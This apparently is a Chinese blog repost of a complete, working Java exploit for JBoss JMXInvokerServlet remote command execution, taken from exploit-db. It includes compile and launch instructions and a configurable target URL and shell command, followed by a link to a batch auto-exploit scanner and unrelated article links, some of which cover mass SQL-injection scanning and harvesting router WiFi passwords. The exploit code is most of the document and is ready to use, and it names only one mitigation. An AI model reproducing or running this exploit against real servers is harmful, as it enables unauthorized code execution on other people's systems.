exploit-db提供出了EXP,如下:

 /*

  * JBoss JMXInvokerServlet Remote Command Execution

  * JMXInvoker.java v0.3 - Luca Carettoni @_ikki

  *

  * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).

  * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"

  * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"

  * and the "JMX Console" are protected or disabled.

  *

  * [FAQ]

  *

  * Q: Is my target vulnerable?

  * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable

  *

  * Q: How to fix it?

  * A: Enable authentication in "jmx-invoker-service.xml"

  *

  * Q: Is this exploit version-dependent?

  * A: Unfortunately, yes. An hash value is used to properly invoke a method.

  *    At least comparing version 4.x and 5.x, these hashes are different.

  *

  * Q: How to compile and launch it?

  * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java

  *    java  -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker

  *    Yes, it's a Java exploit. I can already see some of you complaining....

  */

 import java.io.BufferedReader;

 import java.io.IOException;

 import java.io.InputStream;

 import java.io.InputStreamReader;

 import java.io.ObjectOutputStream;

 import java.lang.reflect.Array;

 import java.lang.reflect.Field;

 import java.lang.reflect.Method;

 import java.net.ConnectException;

 import java.net.HttpURLConnection;

 import java.net.URL;

 import javax.management.MalformedObjectNameException;

 import javax.management.ObjectName;

 import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir)

 public class JMXInvokerServlet {

     //---------> CHANGE ME <---------

     static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1

     static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet";

     static final String cmd = "touch /tmp/exectest";

     //-------------------------------

     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {

         System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]");

         //Create a malicious Java serialized object

         MarshalledInvocation payload = new MarshalledInvocation();

         payload.setObjectName(new Integer(hash));

         //Executes the MBean invoke operation

         Class<?> c = Class.forName("javax.management.MBeanServerConnection");

         Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class);

         payload.setMethod(method);

         //Define MBean's name, operation and pars

         Object myObj[] = new Object[4];

         //MBean object name

         myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");

         //Operation name

         myObj[1] = new String("createScriptDeployment");

         //Actual parameters

         myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"};

         //Operation signature

         myObj[3] = new String[]{"java.lang.String", "java.lang.String"};

         payload.setArguments(myObj);

         System.out.println("\n--[*] MarshalledInvocation object created");

         //For debugging - visualize the raw object

         //System.out.println(dump(payload));

         //Serialize the object

         try {

             //Send the payload

             URL server = new URL(url);

             HttpURLConnection conn = (HttpURLConnection) server.openConnection();

             conn.setRequestMethod("POST");

             conn.setDoOutput(true);

             conn.setDoInput(true);

             conn.setUseCaches(false);

             conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2");

             conn.setRequestProperty("Connection", "keep-alive");

             conn.setRequestProperty("User-Agent", "Java/1.6.0_06");

             conn.setRequestProperty("Content-Type", "application/octet-stream");

             conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");

             conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation");

             ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());

             wr.writeObject(payload);

             System.out.println("\n--[*] MarshalledInvocation object serialized");

             System.out.println("\n--[*] Sending payload...");

             wr.flush();

             wr.close();

             //Get the response

             InputStream is = conn.getInputStream();

             BufferedReader rd = new BufferedReader(new InputStreamReader(is));

             String line;

             StringBuffer response = new StringBuffer();

             while ((line = rd.readLine()) != null) {

                 response.append(line);

             }

             rd.close();

             if (response.indexOf("Script Name") != -1) {

                 System.out.println("\n--[*] \"" + cmd + "\" successfully executed");

             } else {

                 System.out.println("\n--[!] An invocation error occured...");

             }

         } catch (ConnectException cex) {

             System.out.println("\n--[!] A connection error occured...");

         } catch (IOException ex) {

             ex.printStackTrace();

         }

     }

     /*

      * Raw dump of generic Java Objects

      */

     static String dump(Object o) {

         StringBuffer buffer = new StringBuffer();

         Class oClass = o.getClass();

         if (oClass.isArray()) {

             buffer.append("[");

             for (int i = 0; i < Array.getLength(o); i++) {

                 if (i > 0) {

                     buffer.append(",\n");

                 }

                 Object value = Array.get(o, i);

                 buffer.append(value.getClass().isArray() ? dump(value) : value);

             }

             buffer.append("]");

         } else {

             buffer.append("{");

             while (oClass != null) {

                 Field[] fields = oClass.getDeclaredFields();

                 for (int i = 0; i

                         < fields.length; i++) {

                     if (buffer.length() > 1) {

                         buffer.append(",\n");

                     }

                     fields[i].setAccessible(true);

                     buffer.append(fields[i].getName());

                     buffer.append("=");

                     try {

                         Object value = fields[i].get(o);

                         if (value != null) {

                             buffer.append(value.getClass().isArray() ? dump(value) : value);

                         }

                     } catch (IllegalAccessException e) {

                     }

                 }

                 oClass = oClass.getSuperclass();

             }

             buffer.append("}");

         }

         return buffer.toString();

     }

 }

批量扫描az0ne在github上已经有了,https://github.com/az0ne/jboss_autoexploit

JBOSS批量扫描的更多相关文章

  1. Burpsuite+sqlmap批量扫描sql漏洞

    1.burpsuite设置导出log n'd'k 输入文件名保存 2.sqlmap批量扫描     python sqlmap.py -l 文件名 --batch -smart     batch:自 ...

  2. BurpSuite导出log配合SQLMAP批量扫描注入点

    sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQ ...

  3. 批量扫描互联网无线路由设备telnet,并获取WIFI密码

    批量扫描互联网无线路由设备telnet,并获取WIFI密码 http://lcx.cc/?i=4513

  4. sqlmap批量扫描burpsuite请求日志记录

    sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQ ...

  5. BBScan — 一个信息泄漏批量扫描脚本

    github:https://github.com/lijiejie/BBScan 有些朋友手上有几十万甚至上百万个域名,比如,乌云所有厂商的子域名. 如果把这30万个域名全部扔给wvs,APPsca ...

  6. wwwscan网站目录文件批量扫描工具

    准备一个比赛样题里面给的一个扫描的工具: 不知道怎么用就上网百度了一下果然有关于这个软件的两篇介绍(感觉写的很好),第一篇介绍的应该和我的工具一样,也给了例子(现在Google不能访问了)和参数介绍, ...

  7. sqlmap批量扫描burpsuite拦截的日志记录

    1.功能上,sqlmap具备对burpsuite拦截的request日志进行批量扫描的能力 python sqlmap.py -l hermes.log --batch -v 3 --batch:会自 ...

  8. 批量扫描IP端口程序 (适用于window&linux)

    批量扫描IP端口,根据扫描IP导出IP命名的文件的结果.假设1.txt文件内容为127.0.0.1192.168.1.1然后我们获取文件内容IP进行扫描window .bat版本 :1.txt为文件名 ...

  9. 从Excel获取整列内容进行批量扫描

    实习工作原因,需要测试excel表里面ip地址是否存在漏洞,扫了一眼,呕,四五百个IP,光是挨个进行访问,都是一个浩大的工程,所以准备开始摸鱼认真工作 思路是:excel按列提取->将IP按行存 ...

随机推荐

  1. python核心编程学习记录之数字

    仅用于整数的操作

  2. V4L2应用程序框架--一【转】

    本文转载自:http://blog.csdn.net/tommy_wxie/article/details/11369667 V4L2是V4L的升级版本,linux下视频设备程序提供了一套接口规范. ...

  3. SEO之链接农场、内容农场、微信内容农场

    SEO之链接农场.内容农场.微信内容农场 一.“内容农场”的上市之路http://www.neweekly.com.cn/newsview.php?id=3330里斯2006年的第二次创业仍旧延续了上 ...

  4. Extended Data Type Properties [AX 2012]

    Extended Data Type Properties [AX 2012] This topic has not yet been rated - Rate this topic Updated: ...

  5. bash环境变量读取顺序

    bash环境变量读取顺序: 交互式登录的用户: /etc/profile --> /etc/profile.d/*.sh --> ~/.bash_profile --> ~/.bas ...

  6. Java SE、Java EE和Java ME有什么区别?

    Java现在已不仅仅是一种语言,从广义上说,它代表了一个技术体系.该体系根据应用方向的不同主要分为Java SE.Java EE和Java ME的3个部分. 1998年12月份Sun公司公布的Java ...

  7. Jetty 嵌入式开发(实例)

    我尝试了jetty几个版本,类的使用有些差异,在此记录下jettyVersion = 9.0.2.v20130417 的部分实例 maven 依赖及配置: <properties> < ...

  8. ecstore2.0数据库词典

    数据库词典= 数据库tables列表 =|| Name | Comment ||| sdb_aftersales_return_product | 售后申请 || sdb_b2c_brand | 商品 ...

  9. ecshop增加pc扫描二维码微信支付功能代码

    ecshop开发网站,如果没有手机版,又想通过微信支付,可以加入pc二维码扫描微信支付功能 工具/原料 ecshop商城系统,phpqrcode,WxPayPubHelper 公众号已申请微信支付 方 ...

  10. cookie与localstorage和sessionstorage的区别比较

    保存位置: 三者均保存在浏览器端,且同源的. 与服务器的关系: cookie 数据始终在同源的http请求中携带(即使不需要),即cookie在浏览器和服务器间来回传递. sessionStorage ...